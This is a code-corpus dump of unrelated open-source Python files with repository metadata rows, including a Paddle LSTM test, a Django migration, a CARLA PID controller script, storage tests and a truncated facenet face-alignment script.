bias_1 = self.create_parameter(
attr=fluid.ParamAttr(
initializer=fluid.initializer.UniformInitializer(
low=-self._init_scale, high=self._init_scale)),
shape=[self._hidden_size * 4],
dtype="float32",
default_initializer=fluid.initializer.Constant(0.0))
self.bias_arr.append(self.add_parameter('b_%d' % i, bias_1))
def forward(self, input_embedding, init_hidden=None, init_cell=None):
cell_array = []
hidden_array = []
for i in range(self._num_layers):
hidden_array.append(init_hidden[i])
cell_array.append(init_cell[i])
res = []
for index in range(self._num_steps):
step_input = input_embedding[:, index, :]
for k in range(self._num_layers):
pre_hidden = hidden_array[k]
pre_cell = cell_array[k]
weight_1 = self.weight_1_arr[k]
bias = self.bias_arr[k]
nn = fluid.layers.concat([step_input, pre_hidden], 1)
gate_input = fluid.layers.matmul(x=nn, y=weight_1)
gate_input = fluid.layers.elementwise_add(gate_input, bias)
i, j, f, o = fluid.layers.split(
gate_input, num_or_sections=4, dim=-1)
c = pre_cell * fluid.layers.sigmoid(f) + fluid.layers.sigmoid(
i) * fluid.layers.tanh(j)
m = fluid.layers.tanh(c) * fluid.layers.sigmoid(o)
hidden_array[k] = m
cell_array[k] = c
step_input = m
if self._dropout is not None and self._dropout > 0.0:
step_input = fluid.layers.dropout(
step_input,
dropout_prob=self._dropout,
dropout_implementation='upscale_in_train')
res.append(step_input)
real_res = fluid.layers.concat(res, 1)
real_res = fluid.layers.reshape(
real_res, [-1, self._num_steps, self._hidden_size])
last_hidden = fluid.layers.concat(hidden_array, 1)
last_hidden = fluid.layers.reshape(
last_hidden, shape=[-1, self._num_layers, self._hidden_size])
last_hidden = fluid.layers.transpose(x=last_hidden, perm=[1, 0, 2])
last_cell = fluid.layers.concat(cell_array, 1)
last_cell = fluid.layers.reshape(
last_cell, shape=[-1, self._num_layers, self._hidden_size])
last_cell = fluid.layers.transpose(x=last_cell, perm=[1, 0, 2])
return real_res, last_hidden, last_cell
class PtbModel(fluid.Layer):
def __init__(self,
hidden_size,
vocab_size,
num_layers=2,
num_steps=20,
init_scale=0.1,
dropout=None):
super(PtbModel, self).__init__()
self.hidden_size = hidden_size
self.vocab_size = vocab_size
self.init_scale = init_scale
self.num_layers = num_layers
self.num_steps = num_steps
self.dropout = dropout
self.simple_lstm_rnn = SimpleLSTMRNN(
hidden_size,
num_steps,
num_layers=num_layers,
init_scale=init_scale,
dropout=dropout)
self.embedding = Embedding(
size=[vocab_size, hidden_size],
dtype='float32',
is_sparse=False,
param_attr=fluid.ParamAttr(
name='embedding_para',
initializer=fluid.initializer.UniformInitializer(
low=-init_scale, high=init_scale)))
self.softmax_weight = self.create_parameter(
attr=fluid.ParamAttr(),
shape=[self.hidden_size, self.vocab_size],
dtype="float32",
default_initializer=fluid.initializer.UniformInitializer(
low=-self.init_scale, high=self.init_scale))
self.softmax_bias = self.create_parameter(
attr=fluid.ParamAttr(),
shape=[self.vocab_size],
dtype="float32",
default_initializer=fluid.initializer.UniformInitializer(
low=-self.init_scale, high=self.init_scale))
def build_once(self, input, label, init_hidden, init_cell):
pass
@declarative
def forward(self, input, label, init_hidden, init_cell):
init_h = fluid.layers.reshape(
init_hidden, shape=[self.num_layers, -1, self.hidden_size])
init_c = fluid.layers.reshape(
init_cell, shape=[self.num_layers, -1, self.hidden_size])
x_emb = self.embedding(input)
x_emb = fluid.layers.reshape(
x_emb, shape=[-1, self.num_steps, self.hidden_size])
if self.dropout is not None and self.dropout > 0.0:
x_emb = fluid.layers.dropout(
x_emb,
dropout_prob=self.dropout,
dropout_implementation='upscale_in_train')
rnn_out, last_hidden, last_cell = self.simple_lstm_rnn(x_emb, init_h,
init_c)
projection = fluid.layers.matmul(rnn_out, self.softmax_weight)
projection = fluid.layers.elementwise_add(projection, self.softmax_bias)
loss = fluid.layers.softmax_with_cross_entropy(
logits=projection, label=label, soft_label=False)
loss = fluid.layers.reshape(loss, shape=[-1, self.num_steps])
loss = fluid.layers.reduce_mean(loss, dim=[0])
loss = fluid.layers.reduce_sum(loss)
return loss, last_hidden, last_cell
def debug_emb(self):
np.save("emb_grad", self.x_emb.gradient())
def train(place):
num_layers = 1
batch_size = 4
hidden_size = 10
num_steps = 3
init_scale = 0.1
max_epoch = 1
dropout = 0.0
vocab_size = 1000
batch_num = 200
with fluid.dygraph.guard(place):
fluid.default_startup_program().random_seed = SEED
fluid.default_main_program().random_seed = SEED
ptb_model = PtbModel(
hidden_size=hidden_size,
vocab_size=vocab_size,
num_layers=num_layers,
num_steps=num_steps,
init_scale=init_scale,
dropout=dropout)
sgd = SGDOptimizer(
learning_rate=1e-3, parameter_list=ptb_model.parameters())
for epoch_id in range(max_epoch):
total_loss = 0.0
iters = 0.0
total_sample = 0
init_hidden_data = np.zeros(
(num_layers, batch_size, hidden_size), dtype='float32')
init_cell_data = np.zeros(
(num_layers, batch_size, hidden_size), dtype='float32')
init_hidden = to_variable(init_hidden_data)
init_cell = to_variable(init_cell_data)
for step_id in range(batch_num):
x_data = np.arange(12).reshape(4, 3).astype('int64')
y_data = np.arange(1, 13).reshape(4, 3).astype('int64')
y_data = y_data.reshape((-1, 1))
x_data = x_data.reshape((-1, num_steps, 1))
y_data = y_data.reshape((-1, num_steps, 1))
x = to_variable(x_data)
y = to_variable(y_data)
dy_loss, last_hidden, last_cell = ptb_model(x, y, init_hidden,
init_cell)
out_loss = dy_loss.numpy()
dy_loss.backward()
sgd.minimize(dy_loss)
ptb_model.clear_gradients()
total_loss += out_loss
iters += num_steps
total_sample += 1
if step_id % PRINT_STEP == 0:
if step_id == 0:
logging.info("epoch %d | step %d, loss %0.3f" % (
epoch_id, step_id, total_loss / total_sample))
avg_batch_time = time.time()
else:
speed = PRINT_STEP / (time.time() - avg_batch_time)
logging.info(
"epoch %d | step %d, loss %0.3f, speed %.3f steps/s"
% (epoch_id, step_id, total_loss / total_sample,
speed))
avg_batch_time = time.time()
return out_loss, last_hidden.numpy(), last_cell.numpy()
def train_dygraph(place):
program_translator.enable(False)
return train(place)
def train_static(place):
program_translator.enable(True)
return train(place)
class TestPtb(unittest.TestCase):
def setUp(self):
self.place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda() \
else fluid.CPUPlace()
def test_check_result(self):
loss_1, hidden_1, cell_1 = train_static(self.place)
loss_2, hidden_2, cell_2 = train_dygraph(self.place)
self.assertTrue(
np.allclose(loss_1, loss_2),
msg="static loss: {} \ndygraph loss: {}".format(loss_1, loss_2))
self.assertTrue(
np.allclose(hidden_1, hidden_2),
msg="static hidden: {} \ndygraph acc1: {}".format(hidden_1,
hidden_2))
self.assertTrue(
np.allclose(cell_1, cell_2),
msg="static cell: {} \ndygraph cell: {}".format(cell_1, cell_2))
if __name__ == '__main__':
unittest.main()
| 37.301887 | 80 | 0.581858 | [
"Apache-2.0"
] | 92lqllearning/Paddle | python/paddle/fluid/tests/unittests/dygraph_to_static/test_ptb_lm.py | 11,862 | Python |
from tqdm import tqdm
import matplotlib.pyplot as plt
from matplotlib import rc
rc('font',**{'family':'serif','serif':['Palatino']})
rc('text', usetex=True)
rc('text.latex', preamble=r'''\usepackage{amsmath}
\usepackage{physics}
\usepackage{siunitx}
''')
rc('figure', dpi=150)
def plot_and_save(plotting_func):
plotting_func()
plt.savefig(str(plotting_func.__name__).split(sep='.')[0] + '.pdf', bbox_inches='tight', pad_inches = 0)
plt.close()
if __name__ == "__main__":
plotter_list = []
for plotting_func in tqdm(plotter_list):
plot_and_save(plotting_func) | 26.818182 | 108 | 0.69661 | [
"Apache-2.0"
] | jacopok/notes | phd_courses/theoretical_high_energy_astroparticle/figures/make_all_figures.py | 590 | Python |
# Generated by Django 3.2.9 on 2022-01-03 10:15
import cloudinary.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('neighbourhood', '0003_auto_20211222_2324'),
]
operations = [
migrations.CreateModel(
name='Location',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, null=True)),
('created_on', models.DateTimeField(auto_now_add=True, null=True)),
('updated_on', models.DateTimeField(auto_now=True, null=True)),
],
),
migrations.RemoveField(
model_name='profile',
name='name',
),
migrations.AddField(
model_name='neighbourhood',
name='description',
field=models.TextField(max_length=200, null=True),
),
migrations.AddField(
model_name='neighbourhood',
name='hood_image',
field=cloudinary.models.CloudinaryField(max_length=255, null=True, verbose_name='hood_image'),
),
migrations.AddField(
model_name='neighbourhood',
name='location',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='neighbourhood.location'),
),
migrations.AddField(
model_name='profile',
name='location',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='neighbourhood.location'),
),
]
| 34.857143 | 121 | 0.600117 | [
"MIT"
] | Maryan23/MyHood | neighbourhood/migrations/0004_auto_20220103_1315.py | 1,708 | Python |
import deepSI
from deepSI.systems.system import System_ss, System_data
import numpy as np
class NarendraLiBenchmark(System_ss): #https://arxiv.org/pdf/2003.14162.pdf
"""docstring for NarendraLiBenchmark"""
def __init__(self):
'''Noise, system setting and x0 settings'''
super(NarendraLiBenchmark, self).__init__(nx=2)
def f(self,x,u):
x1,x2 = x
x1new = (x1/(1+x1**2)+1)*np.sin(x2)
x2new = x2*np.cos(x2) + x1*np.exp(-(x1**2+x2**2)/8) + u**3/(1+u**2+0.5*np.cos(x1+x2))
return [x1new,x2new]
def h(self,x):
x1,x2 = x
return x1/(1+0.5*np.sin(x2)) + x2/(1+0.5*np.sin(x1)) + self.random.normal(scale=0.1)
def get_train_data(self):
exp = System_data(u=self.random.uniform(low=-2.5,high=2.5,size=(2000,)))
return self.apply_experiment(exp)
def get_test_data(self):
exp = System_data(u=self.random.uniform(low=-2.5,high=2.5,size=(2000,)))
return self.apply_experiment(exp)
if __name__ == '__main__':
from deepSI import fit_systems
sys = NarendraLiBenchmark()
sys_data = sys.get_train_data()
SYS = fit_systems.System_IO_fit_linear
# sys_fit, score, kwargs = fit_systems.fit_system_tuner(SYS, sys_data, dict(na=range(0,7),nb=range(1,7)))
score, sys_fit, kwargs, _ = fit_systems.grid_search(SYS, sys_data, dict(na=range(0,7),nb=range(1,7)))
sys_data_predict = sys_fit.apply_experiment(sys_data)
sys_data.plot()
sys_data_predict.plot(show=True)
| 37.35 | 109 | 0.655957 | [
"BSD-3-Clause"
] | csutakbalazs/deepSI | deepSI/systems/narendra_li_benchmark.py | 1,494 | Python |
from __future__ import absolute_import, division, print_function, \
with_statement
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))
from shadowsocksr.crypto import rc4_md5
from shadowsocksr.crypto import openssl
from shadowsocksr.crypto import sodium
from shadowsocksr.crypto import table
def run(func):
try:
func()
except:
pass
def run_n(func, name):
try:
func(name)
except:
pass
def main():
print("\n""rc4_md5")
rc4_md5.test()
print("\n""aes-256-cfb")
openssl.test_aes_256_cfb()
print("\n""aes-128-cfb")
openssl.test_aes_128_cfb()
print("\n""bf-cfb")
run(openssl.test_bf_cfb)
print("\n""camellia-128-cfb")
run_n(openssl.run_method, "camellia-128-cfb")
print("\n""cast5-cfb")
run_n(openssl.run_method, "cast5-cfb")
print("\n""idea-cfb")
run_n(openssl.run_method, "idea-cfb")
print("\n""seed-cfb")
run_n(openssl.run_method, "seed-cfb")
print("\n""salsa20")
run(sodium.test_salsa20)
print("\n""chacha20")
run(sodium.test_chacha20)
if __name__ == '__main__':
main()
| 20.54902 | 67 | 0.714695 | [
"Apache-2.0"
] | hcaijin/ssrspeedtest | shadowsocksr/encrypt_test.py | 1,048 | Python |
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""
Purpose
Shows how to implement an AWS Lambda function that publishes messages to an
AWS IoT Greengrass connector.
"""
# snippet-start:[greengrass.python.connector-modbus-rtu-usage.complete]
import json
import greengrasssdk
iot_client = greengrasssdk.client('iot-data')
send_topic = 'modbus/adapter/request'
def create_read_coils_request():
return {
"request": {
"operation": "ReadCoilsRequest",
"device": 1,
"address": 0x01,
"count": 1},
"id": "TestRequest"}
def publish_basic_message():
iot_client.publish(
topic=send_topic, payload=json.dumps(create_read_coils_request()))
publish_basic_message()
# In this example, the required AWS Lambda handler is never called.
def function_handler(event, context):
return
# snippet-end:[greengrass.python.connector-modbus-rtu-usage.complete]
| 24.121951 | 75 | 0.706775 | [
"Apache-2.0"
] | 1n5an1ty/aws-doc-sdk-examples | python/example_code/greengrass/snippets/connector_modbus_rtu_usage.py | 989 | Python |
import constraint
coins = [1, 2, 5, 10, 20, 50, 100, 200]
CSP = constraint.Problem()
for coin in coins:
CSP.addVariable(coin, range(0, 201, coin))
CSP.addConstraint(constraint.ExactSumConstraint(200))
print len(CSP.getSolutions()) | 26.222222 | 53 | 0.724576 | [
"MIT"
] | rik0/rk-exempla | some-euler/p31.py | 236 | Python |
#!/usr/bin/env python
# file trying to apply and test the pid controller on carla.
import glob
import os
import sys
import time
import matplotlib.pyplot as plt
from PID_controller import PID
import numpy as np
import speed_profile_reader as spr
try:
sys.path.append(glob.glob('../**/*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
import random
import time
class TestData:
def __init__(self, total_duration, time_increment):
self._iter_num = 0
self.time = np.empty([int(total_duration / time_increment) + 1, 1])
self.setpoint = np.empty([int(total_duration / time_increment) + 1, 1])
self.actual_velocity = np.empty([int(total_duration / time_increment) + 1, 1])
self.error = np.empty([int(total_duration / time_increment) + 1, 1])
def append_data(self, t, sp, vel, error):
self.time[self._iter_num] = t
self.setpoint[self._iter_num] = sp
self.actual_velocity[self._iter_num] = vel
self.error[self._iter_num] = error
self._iter_num+=1
def plot(self):
plt.figure()
plt.plot(self.time, self.setpoint)
plt.plot(self.time, self.actual_velocity)
plt.xlabel('Time (s)')
plt.ylabel('Velocity (m/s)')
plt.title("PID Result")
plt.figure()
plt.plot(self.time, self.error, 'r--', label='error', alpha=0.75, linewidth=0.5)
plt.plot(self.time, np.zeros(len(self.time)), 'k--', linewidth=0.5)
plt.title("Controller Error")
plt.show()
class DataInit:
K = {
"Kp": 0.055734,
"Ki": 0.0114169,
"Kd": .00006
# For 10 m/s
# "Kp": 0.055734,
# "Ki": 0.0130169,
# "Kd": .000006
# "Kp": 1,
# "Ki": 0.0112,
# "Kd": 0.000006
}
total_duration = 20
sampling_period = 0.025
def main():
actor_list = []
verboseIsEnabled = None
try:
"""
Section for starting the client and connecting to the server
"""
client = carla.Client('localhost', 2000)
client.set_timeout(2.0)
for arg in sys.argv:
if (arg == '--verbose'):
verboseIsEnabled = True
if verboseIsEnabled:
print('client version: %s' % client.get_client_version())
print('server version: %s' % client.get_server_version())
print('client to server connection status: {}'.format(client.get_server_version()))
print('Retrieving the world data from server...')
world = client.get_world()
if verboseIsEnabled:
print('{} \n'.format(world))
"""
Section for retrieving the blueprints and spawn the actors
"""
blueprint_library = world.get_blueprint_library()
if verboseIsEnabled:
print('\nRetrieving CARLA blueprint library...')
print('\nobject: %s\n\nblueprint methods: %s\n\nblueprint list:' % (type(blueprint_library), dir(blueprint_library)) )
for blueprint in blueprint_library:
print(blueprint)
audi_blueprint = blueprint_library.find('vehicle.audi.tt')
print('\n%s\n' % audi_blueprint)
color = '191,191,191'
audi_blueprint.set_attribute('color', color)
transform = carla.Transform(
carla.Location(
x=10.5, y=-1.8,
z=38.5),carla.Rotation(yaw=0.0)
)
vehicleEgo = world.spawn_actor(audi_blueprint, transform)
actor_list.append(vehicleEgo)
print('created %s' % vehicleEgo.type_id)
color = random.choice(audi_blueprint.get_attribute('color').recommended_values)
audi_blueprint.set_attribute('color', color)
"""
Section for initializing the PID testing
"""
user_input_sp = None
while (not isinstance(user_input_sp, int)) and (not isinstance(user_input_sp, float)):
user_input_sp = input('Enter the desired Setpoint:\n')
data = TestData(DataInit.total_duration, DataInit.sampling_period)
start = time.time()
print('\nStarting test:\n\n' + 'Time(s) current_vel(m/s) setpoint_vel(m/s) throttle(%) pid_demand')
time.sleep(2.5)
print('.................................................................\n')
time.sleep(1)
# raise SystemExit
p = PID(
DataInit.K['Kp'],
DataInit.K['Ki'],
DataInit.K['Kd']
)
p.setPoint(user_input_sp)
p.Integrator_min = -5
p.Integrator_max = 40
pid = 0
for _ in range(int(DataInit.total_duration / DataInit.sampling_period) + 1):
measurement_value = vehicleEgo.get_velocity().x
vehicleEgo.apply_control(carla.VehicleControl(pid)) if 1 > pid > 0 else vehicleEgo.apply_control(carla.VehicleControl(1))
if 0 > pid: vehicleEgo.apply_control(carla.VehicleControl(brake=abs(pid)))
pid = p.update(measurement_value)
data.append_data(round(time.time() - start, 2), p.getSetPoint(), round(vehicleEgo.get_velocity().x, 5), p.getError())
time.sleep(DataInit.sampling_period)
print('%0.3f\t%0.2f\t\t\t%0.2f\t\t%0.2f\t%0.2f' % (time.time() - start,
vehicleEgo.get_velocity().x,
p.set_point,
vehicleEgo.get_control().throttle,
pid))
data.plot()
print('\nError Mean (Steady State):\n' +
str(round(np.absolute(np.mean(data.error[data.error.shape[0]/2:data.error.shape[0]])), 5)*100) +
'%\n')
finally:
print('destroying actors')
for actor in actor_list:
actor.destroy()
print('done.')
if __name__ == '__main__':
main()
| 33.593407 | 133 | 0.564279 | [
"MIT"
] | AbdulHoffmann/carla_carissma | PythonAPI/carissma_project/PID_apply_static_sp.py | 6,114 | Python |
{% if cookiecutter.use_celery == 'y' %}
from __future__ import absolute_import
import os
from celery import Celery
from django.apps import AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('{{cookiecutter.project_slug}}')
class CeleryConfig(AppConfig):
name = '{{cookiecutter.project_slug}}.taskapp'
verbose_name = 'Celery Config'
def ready(self):
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS, force=True)
{% if cookiecutter.use_sentry_for_error_reporting == 'y' -%}
if hasattr(settings, 'RAVEN_CONFIG'):
# Celery signal registration
from raven import Client as RavenClient
from raven.contrib.celery import register_signal as raven_register_signal
from raven.contrib.celery import register_logger_signal as raven_register_logger_signal
raven_client = RavenClient(dsn=settings.RAVEN_CONFIG['DSN'])
raven_register_logger_signal(raven_client)
raven_register_signal(raven_client)
{%- endif %}
{% if cookiecutter.use_opbeat == 'y' -%}
if hasattr(settings, 'OPBEAT'):
from opbeat.contrib.django.models import client as opbeat_client
from opbeat.contrib.django.models import logger as opbeat_logger
from opbeat.contrib.django.models import register_handlers as opbeat_register_handlers
from opbeat.contrib.celery import register_signal as opbeat_register_signal
try:
opbeat_register_signal(opbeat_client)
except Exception as e:
opbeat_logger.exception('Failed installing celery hook: %s' % e)
if 'opbeat.contrib.django' in settings.INSTALLED_APPS:
opbeat_register_handlers()
{%- endif %}
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # pragma: no cover
{% else %}
# Use this as a starting point for your project with celery.
# If you are not using celery, you can remove this app
{% endif -%}
| 38.253968 | 99 | 0.688797 | [
"Apache-2.0"
] | andkon/botstarter | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/taskapp/celery.py | 2,410 | Python |
import logging
import os
from typing import Generator
import pytest
@pytest.fixture(scope="module", autouse=True)
def change_to_resources_dir(test_resources, request):
os.chdir(test_resources)
yield
os.chdir(request.config.invocation_dir)
@pytest.fixture()
def test_filename(
change_to_resources_dir, storage, request
) -> Generator[str, None, None]:
"""Pushes a file to remote storage, yields its filename and then deletes it from remote storage"""
filename = request.param
storage.push_file(filename)
yield filename
storage.delete(filename)
NAME_COLLISIONS_DIR_NAME = "storage_name_collisions"
@pytest.fixture()
def setup_name_collision(change_to_resources_dir, storage):
"""
Pushes files and dirs with colliding names to remote storage, yields files pushed
and deletes everything at cleanup
"""
pushed_objects = storage.push(NAME_COLLISIONS_DIR_NAME)
yield pushed_objects
storage.delete(NAME_COLLISIONS_DIR_NAME)
@pytest.fixture()
def test_dirname(
change_to_resources_dir, storage, request
) -> Generator[str, None, None]:
"""Pushes a directory to remote storage, yields its name and then deletes it from remote storage"""
dirname = request.param
storage.push_directory(dirname)
yield dirname
storage.delete(dirname)
def test_delete_no_matches(storage, caplog):
with caplog.at_level(logging.WARNING):
deleted_files = storage.delete("there is no such file")
assert len(deleted_files) == 0
assert "Not deleting anything" in caplog.text
def test_delete_file(storage):
storage.push_file("sample.txt", overwrite_existing=True)
assert len(storage.list_objects("sample.txt")) == 1
deleted_objects = storage.delete("sample.txt")
assert len(deleted_objects) == 1
assert len(storage.list_objects("sample.txt")) == 0
def test_delete_with_base_path(storage):
base_path = "base_path"
storage.set_remote_base_path(base_path)
storage.push_file("sample.txt", overwrite_existing=True)
assert len(storage.list_objects("sample.txt")) == 1
deleted_objects = storage.delete("sample.txt")
assert len(deleted_objects) == 1
assert deleted_objects[0].name == f"{base_path}/sample.txt"
def test_delete_dir(storage):
storage.push_directory("sample_dir", overwrite_existing=True)
assert len(storage.list_objects("sample_dir")) == 2
deleted_objects = storage.delete("sample_dir")
assert len(deleted_objects) == 2
assert len(storage.list_objects("sample_dir")) == 0
@pytest.mark.parametrize(
"test_filename",
["sample.txt"],
indirect=["test_filename"],
)
def test_push_file_empty_base_path(storage, test_filename):
remote_objects = storage.push(test_filename)
assert len(remote_objects) == 1
# we need lstrip because s3 paths (and names) start with "/" while google storage paths start without it...
assert remote_objects[0].name.lstrip("/") == test_filename
@pytest.mark.parametrize(
"test_filename",
["sample.txt"],
indirect=["test_filename"],
)
def test_push_file_nonempty_base_path(storage, test_filename):
base_path = "base_path"
storage.set_remote_base_path(base_path)
remote_objects = storage.push(test_filename)
assert len(remote_objects) == 1
assert remote_objects[0].name.lstrip("/") == f"{base_path}/{test_filename}"
@pytest.mark.parametrize(
"test_dirname",
["sample_dir"],
indirect=["test_dirname"],
)
def test_push_directory(storage, test_dirname):
remote_objects = storage.push(test_dirname)
assert len(remote_objects) == 2
assert len(storage.list_objects(test_dirname)) == 2
@pytest.mark.parametrize(
"file_or_dir_name", ["non_existing_file.txt", "non_existing_dir"]
)
def test_push_non_existing(storage, file_or_dir_name):
with pytest.raises(
FileNotFoundError, match="does not refer to a file or directory"
):
storage.push(file_or_dir_name)
@pytest.mark.parametrize(
"test_filename",
["sample.txt"],
indirect=["test_filename"],
)
def test_pull_file(storage, test_filename, tmpdir):
local_base_dir = tmpdir.mkdir("remote_storage")
storage.pull(test_filename, local_base_dir=local_base_dir)
assert os.path.isfile(os.path.join(local_base_dir, test_filename))
pulled_files = storage.pull(test_filename)
assert len(pulled_files) == 0
@pytest.mark.parametrize(
"test_filename",
["sample.txt"],
indirect=["test_filename"],
)
def test_pull_file_to_existing_dir_path(storage, test_filename, tmpdir):
local_base_dir = tmpdir.mkdir("remote_storage")
local_base_dir.mkdir(test_filename)
with pytest.raises(
FileExistsError,
match="Cannot pull file to a path which is an existing directory:",
):
storage.pull(test_filename, local_base_dir=local_base_dir)
@pytest.mark.parametrize(
"test_dirname",
["sample_dir"],
indirect=["test_dirname"],
)
def test_pull_dir(storage, test_dirname, tmpdir):
local_base_dir = tmpdir.mkdir("remote_storage")
storage.pull(test_dirname, local_base_dir=local_base_dir)
assert os.path.isdir(os.path.join(local_base_dir, test_dirname))
assert len(os.listdir(os.path.join(local_base_dir, test_dirname))) == 2
pulled_files = storage.pull(test_dirname)
assert len(pulled_files) == 0
@pytest.mark.parametrize(
"file_or_dir_name", ["non_existing_file.txt", "non_existing_dir"]
)
def test_pull_non_existing(storage, file_or_dir_name, caplog):
with caplog.at_level(logging.WARNING):
pulled_files = storage.pull(file_or_dir_name)
assert len(pulled_files) == 0
assert "No such remote file or directory" in caplog.text
def test_name_collisions_pulling_properly(setup_name_collision, storage, tmpdir):
storage.set_remote_base_path(NAME_COLLISIONS_DIR_NAME)
local_base_dir = tmpdir.mkdir("remote_storage")
colliding_file_name = "file.txt.collision"
colliding_dir_name = "dir_name_collision"
storage.pull("file.txt", local_base_dir=local_base_dir)
storage.pull("dir_name", local_base_dir=local_base_dir)
assert not os.path.isfile(os.path.join(local_base_dir, colliding_file_name))
assert os.path.isfile(os.path.join(local_base_dir, "file.txt"))
assert not os.path.isdir(os.path.join(local_base_dir, colliding_dir_name))
assert os.path.isdir(os.path.join(local_base_dir, "dir_name"))
storage.pull(colliding_file_name, local_base_dir=local_base_dir)
assert os.path.isfile(os.path.join(local_base_dir, colliding_file_name))
storage.pull(colliding_dir_name, local_base_dir=local_base_dir)
assert os.path.isfile(os.path.join(local_base_dir, colliding_dir_name, "file.txt"))
def test_name_collisions_deleting_properly(setup_name_collision, storage):
storage.set_remote_base_path(NAME_COLLISIONS_DIR_NAME)
storage.delete("file.txt")
remaining_object_names = [
obj.name.lstrip("/").lstrip(f"{NAME_COLLISIONS_DIR_NAME}/")
for obj in storage.list_objects("")
]
assert "file.txt" not in remaining_object_names
assert "file.txt.collision" in remaining_object_names
assert "dir_name/file.txt" in remaining_object_names
# TODO or not TODO: many cases are missing - checking names, testing overwriting.
| 33.601852 | 111 | 0.74194 | [
"MIT"
] | AnesBenmerzoug/accsr | tests/accsr/test_remote_storage.py | 7,258 | Python |
"""Performs face alignment and stores face thumbnails in the output directory."""
# MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from scipy import misc
import sys
import os
import argparse
import tensorflow as tf
import numpy as np
import facenet
from detect_face import create_mtcnn, detect_face
import random
from time import sleep
def main(args):
sleep(random.random())
output_dir = os.path.expanduser(args.output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# Store some git revision info in a text file in the log directory
src_path,_ = os.path.split(os.path.realpath(__file__))
facenet.store_revision_info(src_path, output_dir, ' '.join(sys.argv))
dataset = facenet.get_dataset(args.input_dir, False)
print('Creating networks and loading parameters')
with tf.Graph().as_default():
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_memory_fraction)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))
with sess.as_default():
pnet, rnet, onet = create_mtcnn(sess, None)
minsize = 20 # minimum size of face
threshold = [ 0.6, 0.7, 0.7 ] # three steps's threshold
factor = 0.709 # scale factor
# Add a random key to the filename to allow alignment using multiple processes
random_key = np.random.randint(0, high=99999)
bounding_boxes_filename = os.path.join(output_dir, 'bounding_boxes_%05d.txt' % random_key)
with open(bounding_boxes_filename, "w") as text_file:
nrof_images_total = 0
nrof_successfully_aligned = 0
if args.random_order:
random.shuffle(dataset)
for cls in dataset:
output_class_dir = os.path.join(output_dir, cls.name)
if not os.path.exists(output_class_dir):
os.makedirs(output_class_dir)
if args.random_order:
random.shuffle(cls.image_paths)
for image_path in cls.image_paths:
nrof_images_total += 1
filename = os.path.splitext(os.path.split(image_path)[1])[0]
output_filename = os.path.join(output_class_dir, filename+'.png')
print(image_path)
if not os.path.exists(output_filename):
try:
img = misc.imread(image_path)
except (IOError, ValueError, IndexError) as e:
errorMessage = '{}: {}'.format(image_path, e)
print(errorMessage)
else:
if img.ndim<2:
print('Unable to align "%s"' % image_path)
text_file.write('%s\n' % (output_filename))
continue
if img.ndim == 2:
img = facenet.to_rgb(img)
img = img[:,:,0:3]
bounding_boxes, _ = detect_face(img, minsize, pnet, rnet, onet, threshold, factor)
nrof_faces = bounding_boxes.shape[0]
if nrof_faces>0:
det = bounding_boxes[:,0:4]
det_arr = []
img_size = np.asarray(img.shape)[0:2]
if nrof_faces>1:
if args.detect_multiple_faces:
for i in range(nrof_faces):
det_arr.append(np.squeeze(det[i]))
else:
bounding_box_size = (det[:,2]-det[:,0])*(det[:,3]-det[:,1])
img_center = img_size / 2
offsets = np.vstack([ (det[:,0]+det[:,2])/2-img_center[1], (det[:,1]+det[:,3])/2-img_center[0] ])
offset_dist_squared = np.sum(np.power(offsets,2.0),0)
index = np.argmax(bounding_box_size-offset_dist_squared*2.0) # some extra weight on the centering
det_arr.append(det[index,:])
else:
det_arr.append(np.squeeze(det))
for i, det in enumerate(det_arr):
det = np.squeeze(det)
bb = np.zeros(4, dtype=np.int32)
bb[0] = np.maximum(det[0]-args.margin/2, 0)
bb[1] = np.maximum(det[1]-args.margin/2, 0)
bb[2] = np.minimum(det[2]+args.margin/2, img_size[1])
bb[3] = np.minimum(det[3]+args.margin/2, img_size[0])
cropped = img[bb[1]:bb[3],bb[0]:bb[2],:]
scaled = misc.imresize(cropped, (args.image_size, args.image_size), interp='bilinear')
nrof_successfully_aligned += 1
filename_base, file_extension = os.path.splitext(output_filename)
if args.detect_multiple_faces:
